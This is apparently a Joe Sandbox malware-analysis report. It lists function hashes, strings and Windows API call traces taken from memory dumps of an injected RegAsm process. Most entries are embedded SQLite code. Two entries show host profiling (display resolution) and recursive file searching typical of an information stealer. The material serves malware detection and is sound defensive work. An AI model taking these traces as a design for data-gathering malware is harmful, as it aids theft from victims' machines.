Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$YHI;$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2376096024
Opcode ID: 1f6181c50408ea227e90b67a250dd77491497196765a4c4c1cf8a2a8b4d6a735
Instruction ID: 91bbf90516f76ad0204578ccf84e8df0ecb1039b1389226ff6ac38967d4a2cf1
Opcode Fuzzy Hash: 1f6181c50408ea227e90b67a250dd77491497196765a4c4c1cf8a2a8b4d6a735
Instruction Fuzzy Hash: B561D075A083598BD714CF28C880B9AB7E2BF94710F2C496DE8499B3C2D735F905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 199274A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 199274C1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199274CD
unable to close due to unfinalized statements or unfinished backups, xrefs: 199275D1
invalid, xrefs: 199274BC
misuse, xrefs: 199274D7
%s at line %d of [%.10s], xrefs: 199274DC

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: c6ff32c9c221744e6cae5b29db10583a25b1a8998f598cf24ee6247965bfc21a
Instruction ID: a357813cb04a60f793385ee7538a2401c2775b3a8a0052f4b82dcc194cbd351a
Opcode Fuzzy Hash: c6ff32c9c221744e6cae5b29db10583a25b1a8998f598cf24ee6247965bfc21a
Instruction Fuzzy Hash: 01511475900A51ABD3128B3CAC44F5FB7ADAF40614F8D442CE899E3285E731F94AC6A3

Uniqueness

Uniqueness Score: -1.00%

Function 198CBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

PRAGMA %Q.page_size, xrefs: 198CBD03
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 198CBD67
undersize RTree blobs in "%q_node", xrefs: 198CBDA1

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 48d274913f2b12f6b74a4e478a39aca3eba2c7ac2e844a13d9940dea6d7fa55d
Instruction ID: 9a634cb873bc9777237b2aed814d29dd7d80fe29dbfaa932689e1adbd5c9dce5
Opcode Fuzzy Hash: 48d274913f2b12f6b74a4e478a39aca3eba2c7ac2e844a13d9940dea6d7fa55d
Instruction Fuzzy Hash: 8C3137B1900611AFE3008F7CCC80A9673ACFB44756F0D452AFD09D2241D736ED59DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE84 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040EE99
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040EEA4
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040EEAF
ReleaseDC.USER32(00000000,00000000), ref: 0040EEBA
GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?), ref: 0040EEC6
HeapAlloc.KERNEL32(00000000,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?,00000000), ref: 0040EECD
wsprintfA.USER32 ref: 0040EEDF

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Strings

%dx%d, xrefs: 0040EED9

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: 778560b9f76cae89f79a2f657b049482a12e78cc86ef9649c24058194cddea55
Instruction ID: 059e9ed3bbbb0a0d148e481210e129b960f61b39bee8a3c44c7dbc2efc0f3417
Opcode Fuzzy Hash: 778560b9f76cae89f79a2f657b049482a12e78cc86ef9649c24058194cddea55
Instruction Fuzzy Hash: DFF04B71601224BBD7105BA6AD4DD9F7F6DFF4ABA1B001015FA0592250D77449128BE5

Uniqueness

Uniqueness Score: -1.00%

Function 199232F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199236B8, 199236FD, 1992375D, 1992380E
%s at line %d of [%.10s], xrefs: 199236C7, 1992370C, 1992376C, 1992381D
database corruption, xrefs: 199236C2, 19923707, 19923767, 19923818

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 0c89ec8271a3427be8b77956efe92591731361ed0fc5567fd69df9e4be88721d
Instruction ID: b64e704a68a8b77acbf6441477158fc7d8880d24473408599fe19a08dacdec03
Opcode Fuzzy Hash: 0c89ec8271a3427be8b77956efe92591731361ed0fc5567fd69df9e4be88721d
Instruction Fuzzy Hash: 8FF158706046529FD701DF28C881AA6B7E8FF44714F9C459DE888C7285E336F95AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 198528E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 198529F1
unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 19852AA0
malformed inverted index for FTS5 table %s.%s, xrefs: 19852A8A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: e6828c588d6f195e7cea460168c31d60ecd4cb2651a1a11154bd8e44e436a519
Instruction ID: b12e7cc0cb17b1c392c40c36423fcbad36fbbc860a6b77c96003562fa1d089c5
Opcode Fuzzy Hash: e6828c588d6f195e7cea460168c31d60ecd4cb2651a1a11154bd8e44e436a519
Instruction Fuzzy Hash: 3E41B271901261AFE3219F7CDC88E9777ACEF45395F190129FC4AC2140DB359A5ECBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19839700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 198398D3

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 2077be652fe1677e40ec13bbcc01dd62d961ce8c9b8b548c66948bdf4edb5231
Instruction ID: 18bda0ec2d82550d375f84cb5da41be5ed148b63cdbbf6e15d3a7bb92998ab9f
Opcode Fuzzy Hash: 2077be652fe1677e40ec13bbcc01dd62d961ce8c9b8b548c66948bdf4edb5231
Instruction Fuzzy Hash: 0081D1767052009FD7009E28EC40B66F3A1FB84336F6846BEE54A876E1E733E911CB90

Uniqueness

Uniqueness Score: -1.00%

Function 199B8D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

%s-shm, xrefs: 199B8DF2
winOpenShm, xrefs: 199B8FB9
readonly_shm, xrefs: 199B8F52

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 0-2815843928
Opcode ID: e08d9dfef4a59e99e7361c811aaa1c0aef19c4b17fbae8148fe3d179f014680b
Instruction ID: 206b6c9c0ef43c5c735fee93697b29e943cb14b8b8e25ef9acae85614de36de9
Opcode Fuzzy Hash: e08d9dfef4a59e99e7361c811aaa1c0aef19c4b17fbae8148fe3d179f014680b
Instruction Fuzzy Hash: B591CAB19003519FDB119F79CC84B1677ACAB04705F09412DFD8ADA281E73AE91ACBA3

Uniqueness

Uniqueness Score: -1.00%

Function 19829DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 19829EC0
[%!g,%!g],, xrefs: 19829E7E

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 031328240bdcdcbb4a100d51f74167cce9b8455e8e9d5e4e22666b9e475684bd
Instruction ID: ee9e2f5b659b5edbe0366c2229130c8eb183be58aca1a8ab0498f77bed4181ae
Opcode Fuzzy Hash: 031328240bdcdcbb4a100d51f74167cce9b8455e8e9d5e4e22666b9e475684bd
Instruction Fuzzy Hash: BD510371900B059FD710DF2DC9C4B57B7A8BF42380F48862DF8499A291E776E989CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19838C40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

YHI;, xrefs: 19838C43
delayed %dms for lock/sharing conflict at line %d, xrefs: 19838D35
winAccess, xrefs: 19838D60

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 0-1098767804
Opcode ID: 7363dba333b2a359e3a953c7e21749ac9d1d2c20c7f8c69ad48b9022d9083d5a
Instruction ID: 26c223e293f32f4deebfcd747ba3771eb1339cde2d42121ed6b8c46e498972be
Opcode Fuzzy Hash: 7363dba333b2a359e3a953c7e21749ac9d1d2c20c7f8c69ad48b9022d9083d5a
Instruction Fuzzy Hash: 6741E7B6D153519FC640AF38C88195AFBA4ABB5311FCD4A2DF856932D0E730D684C6C3

Uniqueness

Uniqueness Score: -1.00%

Function 1984F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1984F33F
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1984F418
malformed inverted index for FTS%d table %s.%s, xrefs: 1984F3F3

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: ec63f0b9823a80c39e070354f73fd3e260778756540bf7353958a9ad1cdf7c8f
Instruction ID: dcdd1775b9cbac77f78037f57df8faf659b34c3564da7c4147eae9f1ae37d6f3
Opcode Fuzzy Hash: ec63f0b9823a80c39e070354f73fd3e260778756540bf7353958a9ad1cdf7c8f
Instruction Fuzzy Hash: 3441AEB19012A59FD3109B3DDC88B9B37ACEF41655F19442DFC0AC6180DB319A5ACAA2

Uniqueness

Uniqueness Score: -1.00%

Function 198430F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39c01186d1047271403072344a276cdc30ae262c847d1b2bfdf6ebe523f1e381
Instruction ID: 3b2ddf5a52e88969116dbafb1c6387826bdd9f8787ffdf0639fdf097b05f373f
Opcode Fuzzy Hash: 39c01186d1047271403072344a276cdc30ae262c847d1b2bfdf6ebe523f1e381
Instruction Fuzzy Hash: DE516175608211BFDB40EB68FC05F9A7BE2EF85320F1985A8F158872B1E332D991DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00414B45 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414B4A
lstrcat.KERNEL32(?,?), ref: 00414BA0

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

lstrcat.KERNEL32(?,00000000), ref: 00414BC6
lstrcat.KERNEL32(?,?), ref: 00414BE6
lstrcat.KERNEL32(?,?), ref: 00414BFA
lstrcat.KERNEL32(?), ref: 00414C0D
lstrcat.KERNEL32(?,?), ref: 00414C21
lstrcat.KERNEL32(?), ref: 00414C34

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00414960: _EH_prolog.MSVCRT ref: 00414965
Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 0041497C
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414983
Part of subcall function 00414960: wsprintfA.USER32 ref: 0041499B
Part of subcall function 00414960: FindFirstFileA.KERNEL32(?,?), ref: 004149B2
Part of subcall function 00414960: StrCmpCA.SHLWAPI(?,00424800), ref: 004149CF
Part of subcall function 00414960: StrCmpCA.SHLWAPI(?,00424804), ref: 004149E5
Part of subcall function 00414960: wsprintfA.USER32 ref: 00414A05
Part of subcall function 00414960: FindNextFileA.KERNEL32(00000000,?), ref: 00414A5C
Part of subcall function 00414960: FindClose.KERNEL32(00000000), ref: 00414A6B
Part of subcall function 00414960: lstrcat.KERNEL32(?,?), ref: 00414A90
Part of subcall function 00414960: lstrcat.KERNEL32(?), ref: 00414AA3
Part of subcall function 00414960: lstrlen.KERNEL32(?), ref: 00414AAC
Part of subcall function 00414960: lstrlen.KERNEL32(?), ref: 00414AB9

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$FileFind$Heaplstrlenwsprintf$AllocAttributesCloseFirstFolderNextPathProcesslstrcpy
String ID:
API String ID: 760377888-0
Opcode ID: 2fd2118d9e73fe8952fe396a3eda644bbd21138287a78ec7cd839b56adaa2840
Instruction ID: 552a54571b08f363630c61cde02512864f6d1c9145b9a996542915a0ff5b4072
Opcode Fuzzy Hash: 2fd2118d9e73fe8952fe396a3eda644bbd21138287a78ec7cd839b56adaa2840
Instruction Fuzzy Hash: DA41B2B2C0111DABCF21EBB1EC49EDE777CAF49314F0045BAB505E2152E638E7588B95

Uniqueness

Uniqueness Score: -1.00%

Function 1983B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
